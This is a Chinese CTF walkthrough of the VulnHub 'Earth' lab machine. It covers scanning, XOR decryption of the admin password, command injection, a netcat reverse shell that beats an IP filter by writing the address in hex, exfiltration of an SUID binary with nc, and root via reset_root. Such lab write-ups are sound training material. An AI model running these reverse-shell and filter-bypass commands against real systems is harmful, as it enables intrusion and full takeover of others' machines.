首页 > 其他分享 >vulnhub_Earth_WP

vulnhub_Earth_WP

时间:2023-04-19 23:22:07浏览次数:47  
标签:root WP 192.168 vulnhub earth Earth tcp terratest local

前言

靶机地址->>>vulnhub_Earth
攻击机ip:192.168.20.121
靶机ip:192.168.20.122

参考文章
https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html
https://www.cnblogs.com/wthuskyblog/p/16032277.html
https://www.cnblogs.com/CHOSEN1-Z13/p/15915195.html

探测靶机

  1. 使用nmap扫描c段
    nmap 192.168.20.0/24
点击查看扫描结果
┌──(root㉿kali-purple)-[/home/kali]
└─# nmap 192.168.20.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 21:37 CST
Nmap scan report for 192.168.20.1
Host is up (0.00011s latency).
All 1000 scanned ports on 192.168.20.1 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:C0:00:08 (VMware)

Nmap scan report for 192.168.20.2
Host is up (0.00074s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
53/tcp open  domain
MAC Address: 00:50:56:FE:42:C8 (VMware)

Nmap scan report for 192.168.20.122
Host is up (0.00041s latency).
Not shown: 983 filtered tcp ports (no-response), 14 filtered tcp ports (admin-prohibited)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https
MAC Address: 00:0C:29:29:AE:FF (VMware)

Nmap scan report for 192.168.20.254
Host is up (0.00018s latency).
All 1000 scanned ports on 192.168.20.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:F4:37:D0 (VMware)

Nmap scan report for 192.168.20.121
Host is up (0.0000020s latency).
Not shown: 999 closed tcp ports (reset)
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Nmap done: 256 IP addresses (5 hosts up) scanned in 10.67 seconds

这里可以发现192.168.20.122为本次靶机开放了22,80端口以及443

  1. 使用-A参数查看完整靶机信息

nmap -A 192.168.20.122 -p 22,80,443

点击查看扫描结果

┌──(root㉿kali-purple)-[/home/kali]
└─# nmap -A 192.168.20.122 -p 22,80,443
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 21:44 CST
Nmap scan report for 192.168.20.122
Host is up (0.00047s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA)
|_  256 b03c723b722126ce3a84e841ecc8f841 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
| tls-alpn: 
|_  http/1.1
MAC Address: 00:0C:29:29:AE:FF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc|specialized
Running (JUST GUESSING): Linux 5.X|4.X|3.X|2.6.X (98%), Synology DiskStation Manager 5.X (92%), Crestron 2-Series (90%)
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:crestron:2_series
Aggressive OS guesses: Linux 5.0 - 5.3 (98%), Linux 5.4 (98%), Linux 4.15 - 5.6 (97%), Linux 5.0 - 5.4 (96%), Linux 3.2 - 4.9 (94%), Linux 2.6.32 - 3.10 (93%), Linux 2.6.32 (92%), Linux 3.10 - 4.11 (92%), Synology DiskStation Manager 5.2-5644 (92%), Linux 2.6.32 - 3.13 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms 192.168.20.122

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.67 seconds

这里可以发现80端口是400的一个状态然后443端口做了dns
DNS:terratest.earth.local

网站信息收集

  1. 更改hosts文件,目录为/etc/hosts

image

  1. 使用域名访问网站

image
发现了3个key

点击查看代码

    37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
    3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
    2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

  1. 扫描网站目录

  2. 使用dirsearch扫描
    安装命令如下
    apt install dirsearch
    运行
    dirsearch -u terratest.earth.local/

点击查看扫描结果
┌──(root㉿kali-purple)-[/home/kali/桌面]
└─# dirsearch -u terratest.earth.local/                                                   

  _|. _ _  _  _  _ _|_    v0.4.2                                                          
 (_||| _) (/_(_|| (_| )                                                                   
                                                                                          
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927                                                                                        

Output File: /root/.dirsearch/reports/terratest.earth.local-_23-04-16_12-46-03.txt

Error Log: /root/.dirsearch/logs/errors-23-04-16_12-46-03.log

Target: http://terratest.earth.local/

[12:46:03] Starting: 
[12:46:11] 301 -    0B  - /admin  ->  /admin/                               
[12:46:11] 200 -  306B  - /admin/                                           
[12:46:11] 200 -  306B  - /admin/?/login                                    
[12:46:11] 200 -  746B  - /admin/login                                      
[12:46:18] 403 -  199B  - /cgi-bin/                                         
                                                                             
Task Completed                                                                                                                                               
                  

发现了网站后台地址,/cgi-bin/我们是没权限访问的

  1. 查看网站后台

image

image

手工尝试爆破几次发现不是常见弱口令

  1. dirb目录扫描
点击查看扫描结果
                                                                                                                                                             
┌──(root㉿kali-purple)-[/home/kali/桌面]                                                                                                                     
└─# dirb https://terratest.earth.local/
                                                                                                                                                             
-----------------                                                                                                                                            
DIRB v2.22                                                                                                                                                   
By The Dark Raver                                                                                                                                            
-----------------

START_TIME: Sun Apr 16 13:11:00 2023
URL_BASE: https://terratest.earth.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: https://terratest.earth.local/ ----
+ https://terratest.earth.local/cgi-bin/ (CODE:403|SIZE:199)                                                                                                
+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)                                                                                               
+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)                                                                                              
                                                                                                                                                            
-----------------
END_TIME: Sun Apr 16 13:11:03 2023
DOWNLOADED: 4612 - FOUND: 3

查看robots.txt

image

这里可与i看到有一个不一样的文件 /testingnotes.* 但是不知道后缀 fuzz一下

  1. fuzz文件后缀

使用dirbuster的字典就可以了,路径如下
/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

wfuzz -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt https://terratest.earth.local/testingnotes.FUZZ | grep "200"

image

这里可以看到结果为.txt,访问一下

image

测试安全消息传递系统注意事项:
*使用 XOR 加密作为算法,应该像在 RSA 中使用一样安全。
*地球已确认他们已收到我们发送的消息。
*测试数据.txt用于测试加密。
*Terra 用作管理门户的用户名。
待办事项:
*我们如何安全地将每月密钥发送到地球?还是我们应该每周更换密钥?
*需要测试不同的密钥长度以防止暴力破解。密钥应该有多长?
*需要改进消息传递界面和管理面板的界面,目前非常基础。

  1. 解密
    不是很懂加密所以这一部分参考大佬博客,附上博客连接
    Jing-X的博客
点击查看代码
import binascii
key1 = "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40"
key2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"
key3 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
decode_txt = b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."

testdata = binascii.b2a_hex(decode_txt).decode()

print(hex(int(key1,16) ^ int(testdata,16)))
print(hex(int(key2,16) ^ int(testdata,16)))
print(hex(int(key3,16) ^ int(testdata,16)))

将解密出来的16进制转换一下

image

image

点击查看解密结果
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's hisCfy //}omo;/ppeare'2~d;f$'x,jj=*alf3,oq|y$w6&|%Qjvw+U <@f;y/jkr0~h<Pj1s.=i뤽q,<j${ugn$u6&*+o'erlj|mnn/?;-'1%,f{kx8.`b)"⬮p`ust*yzd1}xbi:o{)~sh},^6#Tjcy7aj,yn>Hhu-skl)$In*'y/dybj7pt4~u"t=5jgh&#yx*+fwi=/eapyrncanxky8/k<6=+1䍑*Ir8xo"P|7wfbn66놖ƥF኶F嫧&2FFƤW7F7F娦Ƅプ"WfFV೒V'Ff닖B쵲Bä&Ɔ텖V'2v⢶F¦Rf'7B&Ɔ텖V'2낖'Fw27F璂ƖfRV&VB¦R暶äƄ&Vv¦ⓆfV7BV'Fw2FƷ7W&Rƅ7W&f6RÖFƥF⦆R&ᙷ&Ƨᣗg邧ƂFrƶ2WvV#Cf2FFSvb6V7△㚆㛶GG3痦6f'榢Cd禗㻇gFǃG੶6Bǃff6WFFVRǷG#࿳rFggභ–cGGcgVFearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat

earthclimatechangebad4humans这一段字符串重复,实验密码

用户名,查看urlhttp://terratest.earth.local/admin/login
可以发现这是terra的测试,那么terra很有可能就是登录的用户名之一

账号:terra
密码:earthclimatechangebad4humans

image

漏洞发现及利用

发现漏洞

经过信息收集我们成功进入到了网站后台,在后台中有一个命令执行的输入框

image

可以发现权限很低

image

反弹shell

通过rce漏洞我们使用nc直接反弹shell到攻击机上

nc -nv 192.168.20.128 6666 -c bash

kali开启监听
image

image

后续更换了kali_linux IP为192.168.20.128

起初以为是有端口限制后面参考了网上的wp发现是服务器段采用了正则对IP进行数字匹配

find / -name "*.py" -type f | xargs grep "Remote connections are forbidden"

image

cat /var/earth_web/secure_message/forms.py

image

将ip地址转16进制即可反弹shell

点击即可跳转在线转换工具

image

nc -nv 0Xc0a81480 6666 -c bash

image

查找flag

find / -name "*flag*"

image

cat /var/earth_web/user_flag.txt

image
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]

SUID提权

find / -perm -u=s -type f 2>/dev/null

image

运行,发现报错

image

使用nc将文件传递回本地环境测试

点击查看代码
nc 192.168.20.128 1234 < /usr/bin/reset_root
nc -lnvp 1234 >reset_root

image

image

image

要chmod 777 reset_root给他权限
然后strace reset_root进行调试

image

image

运行之前安装strace
apt install strace
strace ./reset_root

image

可以发现是缺少了这三个文件

touch创建这三个文件,再运行reset_root,发现将root密码重置成了Earth:

点击查看命令
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe

image

提权完毕查看root目录下的flag

image

[root_flag_b0da9554d29db2117b02aa8b66ec492e]

标签:root,WP,192.168,vulnhub,earth,Earth,tcp,terratest,local
From: https://www.cnblogs.com/zy4024/p/vulnhub_Earth.html

相关文章

  • Azure DevOps(一)基于 Net6.0 的 WPF 程序如何进行持续集成、持续编译
    一,引言我们是否正在为如何快速的编译、部署客户端应用程序而烦恼?这也是博主最近遇到的问题。目前博主所在公司主要做项目级的定制化开发,多以C/S架构的WPF程序为主,每次到了协助开发团队给实施团队编译好的要测试程序包时,就会出现多人协助,编译、打包好的二进制程序包pull......
  • WPS关闭不了后台一直运行的解决办法(wpscloudsvr.exe)
    问题描述前几天,发现每次打开wps时机箱风扇就转得厉害,把WPS界面叉掉后,桌面的任务栏—就是桌面最下面得黑框框—显示Windows图标和时间日期的那个地方也没有WPS任务,但是机箱还是响的厉害,检查了任务管理器发现一直显示“wps服务程序,提供账号登陆...”而且还占用近10%的CPU资源,难......
  • WPF 给控件增加圆角效果注意事项
    一般都使用Border包住需要增加圆角效果的控件,但是有一些地方需要注意:<BorderCornerRadius="8"Background="Red"><TextBlockBackground="Red"Margin="4"Height="20"FontSize="8"Foreground="White"/>......
  • WPS和excel默认切换
       ......
  • WPF 绑定注意事项二
    1.通用静态快捷键绑定命令cs:publicstaticKeyBtnReferHotKey=Key.F7;xaml:<UserControl.InputBindings><KeyBindingKey="{x:Staticcommon:Common.BtnReferHotKey}"Command="{BindingCmdSelectFromMaterial}"CommandParameter=&......
  • Vulnhub之Inclusiveness靶机详细测试过程
    Inclusiveness识别目标主机IP地址─(kali㉿kali)-[~/Desktop/Vulnhub/Inclusiveness]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts......
  • 不坑盒子(Office,WPS接入人工智能)助你高效办公,掐点准时下班回家。
    不坑盒子很多朋友在工作过程中需要对Word文档进行编辑处理,如果想让Word排版更有效率可以试试小编带来的这款不坑盒子软件,这是一个非常好用的插件工具,专门应用在Word文档中,支持Office2010以上的版本,用户可以借助工具快速实现排版操作,还支持仿手写功能,简单实用,同时还支持使用ChatG......
  • 界面控件DevExpress WPF甘特图组件,让项目管理拥有极佳性能!
    DevExpressWPF Gantt(甘特图)控件允许开发者在任何WPF桌面应用程序中快速集成项目计划和任务调度功能。在上文中(点击这里回顾>>)我们介绍了DevExpressWPF甘特图的性能、动态缩放等,本文将继续分享甘特图的其他功能,持续关注我们获取更多产品中文资讯哦~DevExpressWPF拥有120+个控......
  • Vulnhub:Misdirection 1靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.1308080端口/debug目录,是一个可以执行命令的shell获得反弹shellrm/tmp/f;mkfifo/tmp/f;cat/tmp/f|sh-i2>&1|nc192.168.111.1114444>/tmp/f提......
  • rectangle(), drawpoly()
    #include<graphics.h>#include<stdio.h>intmain(){inti;intpoints[8]={320,0,0,240,640,240,320,0};intgraphdriver=DETECT;intgraphmod......